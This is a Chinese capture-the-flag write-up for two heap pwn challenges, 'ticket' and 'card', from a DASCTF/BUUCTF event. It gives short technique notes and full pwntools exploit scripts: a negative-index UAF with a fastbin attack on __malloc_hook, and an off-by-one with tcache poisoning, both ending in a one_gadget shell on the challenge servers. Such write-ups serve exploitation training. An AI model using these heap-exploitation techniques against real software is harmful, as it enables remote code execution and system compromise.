DASCTFxBuuctf五月大联动
还得加油
# ticket
libc-2.23 下的题目,漏洞点在于只要某个位置 + 6 的地方有值,就可以 free 该位置,之后将那个位置 + 6 位置清 0
- 将输入信息的堆块申请两次,之后用负数下标(-2 和 -1)free 掉输入信息所在的堆块,再显示信息就可以泄露堆地址
- free 一个大块后再申请小块,让 malloc 切割它,切出来的块里残留着 main_arena 中 bin 头的指针,show 出来即可泄露 libc 地址(脚本里的 -360-16 就是 bin 头相对 __malloc_hook 的偏移)
- 既然我们有堆地址,那么我们可以在 age 处伪造一个指针,这个指针指向一个堆块,那么加上之前申请的一个指针就有两个指针指向了同一个堆块,从而构成 UAF
- 利用 realloc 调节栈帧(__malloc_hook 写 realloc+6,__realloc_hook 写 one_gadget)再 getshell
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
# Verbose pwntools logging so every send/recv of the exploit is visible.
context.log_level = 'debug'
binary = 'ticket'
elf = ELF(binary)
# The libc shipped with the challenge; every offset below assumes this build.
libc = ELF("./libc-2.23.so")
context.binary = binary

# DEBUG = 1 runs the binary locally, 0 talks to the remote instance.
# For a qemu-user target the local process would instead be wrapped as
# ["qemu-aarch64", "-L", sysroot, binary] (append "-g", "1234" for a gdb stub).
DEBUG = 0
host = "node3.buuoj.cn"
port = 29266
p = process(binary) if DEBUG else remote(host, port)
def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes ending there as a 64-bit address."""
    raw = p.recvuntil("\x7f")
    return u64(raw[-6:].ljust(8, "\x00"))


def l32():
    """32-bit counterpart of l64: the pointer is expected to end in 0xf7."""
    raw = p.recvuntil("\xf7")
    return u32(raw[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter with prompt and payload both passed through str().

    NOTE(review): the str() coercion is a no-op for Python 2 str payloads
    (p64() output included); under Python 3 it would turn bytes into the
    text "b'...'" and corrupt every packed pointer sent through here.
    """
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter with prompt and payload both passed through str() (same caveat as sla)."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log a named value in hex on pwntools' success channel."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Raw send without a trailing newline."""
    return p.send(payload)


def rl():
    """Receive whatever is currently available."""
    return p.recv()


def sl(payload):
    """Send with a trailing newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the str() form of `a` has been seen."""
    return p.recvuntil(str(a))
def dbg():
    """Attach gdb to the live target, then block until the operator continues.

    Only meaningful when DEBUG runs a local process; against the remote
    instance gdb.attach has nothing to attach to.
    """
    gdb.attach(p)
    pause()
def cmd(num):
    """Pick a menu entry: wait for the ">>" prompt and send `num` as a decimal line."""
    p.sendlineafter(">>", str(num))
def add(id, size):
    """Menu 1: answer the "Index:" and "size:" prompts with `id` and `size`.

    The menu only takes an index and a size here; the content of the chunk is
    written separately through edit().
    """
    cmd(1)
    for prompt, value in (("Index:", id), ("size:", size)):
        p.sendlineafter(prompt, str(value))
def delete(id):
    """Menu 2: free slot `id`.

    The exploit relies on the target accepting negative indices here
    (delete(-2), delete(-1), delete(-3), delete(-10) below), i.e. on the
    weak "slot+6 must be non-zero" check described in the writeup notes.
    """
    cmd(2)
    p.sendlineafter("Index:", str(id))
def edit(id, text):
    """Menu 3: write `text` into slot `id` via the "remarks:" prompt (sent as a line)."""
    cmd(3)
    p.sendlineafter("Index:", str(id))
    p.sendlineafter("remarks:", str(text))
def show(id):
    """Menu 4: print the content of slot `id`; the caller parses the output."""
    cmd(4)
    p.sendlineafter("Index:", str(id))
def show_info():
    """Menu 6: print the personal-info record (the heap leak is read from its "Saying: " line)."""
    p.sendlineafter(">>", "6")
def info(addr):
    """Fill in the three-field personal-info form.

    Name and take-off receive 0x20 bytes of filler (sendafter, no newline);
    `addr` is sent as decimal text for the age. The exploit later passes a
    heap address here so that the age slot doubles as a pointer into the heap
    (see the writeup notes above).
    """
    filler = "a" * 0x20
    p.sendafter("Your name:", filler)
    p.sendafter("take off(wu hu qi fei): ", filler)
    p.sendlineafter("Your age: ", str(addr))
# one_gadget offsets for the challenge's libc-2.23 build; only one_gad[1] is used.
one_gad = [0x45216,0x4526a,0xf02a4,0xf1147]

# --- Stage 1: heap leak ------------------------------------------------------
# Fill the info form twice (menu 5 re-enters it), per the writeup note
# "allocate the info chunk twice".
info(1)
cmd(5)
info(1)
add(4,0x100)  # original note: makes sure name+6 holds a value so the free check passes
add(5,0x100)
# Negative indices: presumably reach the info fields in front of the slot
# table; freeing them leaves heap pointers that show_info() then prints.
delete(-2)
delete(-1)
show_info()
p.recvuntil("Saying: ")
# The pointer is printed raw up to the newline; drop the "\n" and unpack.
heap_addr = u64(p.recvuntil("\x0a")[0:-1].ljust(8,"\x00"))
lg("leak",heap_addr)

# --- Stage 2: libc leak ------------------------------------------------------
add(0,0x28)
add(1,0x28)
add(2,0x118)
add(3,0x118)
# Free the 0x120 chunk (slot 3 sits between it and top, so it is not merged
# into top), then ask for a smaller chunk: malloc sorts the freed chunk into
# its bin and splits it, and the returned memory still carries the bin-head
# pointers of the old free chunk, which show(2) prints.
delete(2)
add(2,0x28)
show(2)
# Leaked pointer = &main_arena + 360; in the 2.23 main_arena layout 0x168 is
# the head of the 0x120 small bin the chunk was sorted into, and main_arena
# starts 0x10 past __malloc_hook.
__malloc_hook = l64() - 360 - 16
lg("__malloc_hook",__malloc_hook)
libc_base = __malloc_hook - libc.sym["__malloc_hook"]
realloc = libc.sym["realloc"] + libc_base
one_gadget = libc_base + one_gad[0]  # computed but not used; the payload uses one_gad[1]
lg("realloc",realloc)
lg("libc_base",libc_base)

# --- Stage 3: fastbin attack on __malloc_hook via a forced UAF ---------------
delete(2)
delete(-10)  # role not determinable from this script (slot/bin housekeeping)
add(2,0x60)  # original note: a 0x70 chunk can be linked with the fake chunk forged at malloc_hook
# Re-enter the info form with age = a heap pointer (presumably slot 2's 0x70
# chunk, data offset +0x10): the age field now acts as a second reference to
# that chunk, so freeing it through delete(-3) leaves slot 2 dangling (UAF).
cmd(5)
info(heap_addr+0x2b0+0x10)
delete(-3)
# Overwrite the freed chunk's fastbin fd with the classic 2.23 fake chunk at
# __malloc_hook-0x23, whose size byte is the 0x7f of a neighbouring libc pointer.
edit(2 ,p64(__malloc_hook - 0x23))  # original note: construct two pointers to the same chunk
# Slots 0/1 are freed and reused as the two 0x70 requests; the first returns
# the dangling chunk, the second the fake chunk in front of __malloc_hook.
delete(0)
delete(1)
add(0,0x68)
add(1,0x68)
# Fake chunk data starts at __malloc_hook-0x13: 0xb bytes of padding reach
# __realloc_hook (= __malloc_hook-0x8) -> one_gadget, then __malloc_hook ->
# realloc+6. realloc+6 skips realloc's initial pushes, shifting the stack so
# the one_gadget constraint holds when realloc calls __realloc_hook.
payload = "a"*0xb + p64(one_gad[1] + libc_base) + p64(realloc +6)
edit(1, payload)
#dbg()
# Trigger: re-entering the info form allocates, which goes through the hooks.
delete(-10)
cmd(5)
p.interactive()
# card
libc-2.27,off-by-one 改写相邻 chunk 的 size(0x21 -> 0x41)造成堆块重叠,再通过 tcache poisoning 把 __malloc_hook 写成 one_gadget
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
# Verbose pwntools logging so every send/recv of the exploit is visible.
context.log_level = 'debug'
binary = 'card'
elf = ELF(binary)
# The libc shipped with the challenge; every offset below assumes this build.
libc = ELF("libc.so")
context.binary = binary

# DEBUG = 1 runs the binary locally, 0 talks to the remote instance.
# For a qemu-user target the local process would instead be wrapped as
# ["qemu-aarch64", "-L", sysroot, binary] (append "-g", "1234" for a gdb stub).
DEBUG = 0
host = "node3.buuoj.cn"
port = 25850
p = process(binary) if DEBUG else remote(host, port)
def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes ending there as a 64-bit address."""
    raw = p.recvuntil("\x7f")
    return u64(raw[-6:].ljust(8, "\x00"))


def l32():
    """32-bit counterpart of l64: the pointer is expected to end in 0xf7."""
    raw = p.recvuntil("\xf7")
    return u32(raw[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter with prompt and payload both passed through str().

    NOTE(review): the str() coercion is a no-op for Python 2 str payloads
    (p64() output included); under Python 3 it would turn bytes into the
    text "b'...'" and corrupt every packed pointer sent through here.
    """
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter with prompt and payload both passed through str() (same caveat as sla)."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log a named value in hex on pwntools' success channel."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Raw send without a trailing newline."""
    return p.send(payload)


def rl():
    """Receive whatever is currently available."""
    return p.recv()


def sl(payload):
    """Send with a trailing newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the str() form of `a` has been seen."""
    return p.recvuntil(str(a))
def dbg():
    """Attach gdb to the live target, then block until the operator continues.

    Only meaningful when DEBUG runs a local process; against the remote
    instance gdb.attach has nothing to attach to.
    """
    gdb.attach(p)
    pause()
def cmd(num):
    """Pick a menu entry: wait for the "choice:" prompt and send `num` as a decimal line."""
    p.sendlineafter("choice:", str(num))
def add(id, size, text):
    """Menu 1: create card `id` with a `size`-byte "power" buffer and write `text` into it.

    `text` is sent with a trailing newline; when the exploit's final
    allocation is hijacked the "quickly!" prompt is never reached, which is
    why the trigger at the end of the script does not call this helper.
    """
    cmd(1)
    for prompt, value in (("card:", id), ("power:", size), ("quickly!", text)):
        p.sendlineafter(prompt, str(value))
def edit(id, text):
    """Menu 2: overwrite card `id`'s buffer with `text`.

    The exploit sends 0x19 bytes into a 0x18-byte card here, i.e. this is the
    off-by-one write. The prompts matched ("card", "show") are shorter than
    the ones used by the other helpers; presumably the menu text differs here.
    """
    cmd(2)
    p.sendlineafter("card", str(id))
    p.sendlineafter("show", str(text))
def delete(id):
    """Menu 3: free card `id`."""
    cmd(3)
    p.sendlineafter("card:", str(id))
def show(id):
    """Menu 4: print card `id`; the caller pulls the leaked pointers out of the output."""
    cmd(4)
    p.sendlineafter(":", str(id))
# one_gadget offsets for the challenge's libc-2.27 build; one_gadget[2] is the one written.
one_gadget = [0x4f2c5,0x4f322,0x10a38c]

# --- Stage 1: libc leak ------------------------------------------------------
# Nine 0xa0-sized chunks. Freeing cards 0-6 fills the seven-entry tcache bin
# for that size, so freeing card 7 goes to the unsorted bin instead; card 8
# stays allocated so the freed chunk does not merge into top.
for i in range(7):
    add(i,0x98,"aaaa")
add(7,0x98,"aaaa")
add(8,0x98,"aaaa")
for i in range(7):
    delete(i)
delete(7)
# Carve three 0x20 chunks out of the freed 0xa0 chunk. The first one (card 9)
# still holds the fd/bk that pointed at the bin head the chunk was sorted into.
add(9,0x18,"aaa")
add(10,0x18,"aaa")
add(11,0x18,"aaa")
show(9)
# Two pointers come back. The first is discarded: its low bytes are likely
# clobbered by the "aaa" filler written into card 9. The second (bk) is intact.
l64()
# bk = &main_arena + 240; in the 2.27 main_arena layout 0xf0 is the head of the
# 0xa0 small bin, and main_arena starts 0x10 past __malloc_hook.
__malloc_hook = l64() - 240 - 16
lg("leak",__malloc_hook)
libc_base = __malloc_hook - libc.sym["__malloc_hook"]

# --- Stage 2: off-by-one -> overlapping chunks -> tcache poisoning -----------
# 0x19 bytes into card 9's 0x18-byte buffer: the trailing 0x41 lands on the
# size field of card 10, turning 0x21 into 0x41 (now spans card 11 as well).
edit(9,"\x00"*0x18 + "\x41" )
# Free card 10 as a 0x40 chunk and take it straight back with a 0x38 request:
# the new card 10 overlaps card 11's chunk header and fd.
delete(10)
add(10,0x38,"aaa")
delete(11)  # card 11 goes to the 0x20 tcache bin
# Through card 10: three qwords cover its own body plus card 11's prev_size,
# then restore card 11's size (0x21) and point its tcache next at __malloc_hook.
payload = p64(0) *3 + p64(0x21) + p64(__malloc_hook)
edit(10,payload)
add(0,0x18,"aaa")  # pops card 11's chunk from tcache
add(1,0x18,p64(one_gadget[2]+libc_base))  # pops __malloc_hook; the text write drops the gadget there
# Trigger: start another allocation. malloc() fires __malloc_hook before the
# content prompt is reached, so only the index and power are sent.
cmd(1)
sla("card:",3)
sla("power:",0x10)
p.interactive()
本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 进行许可。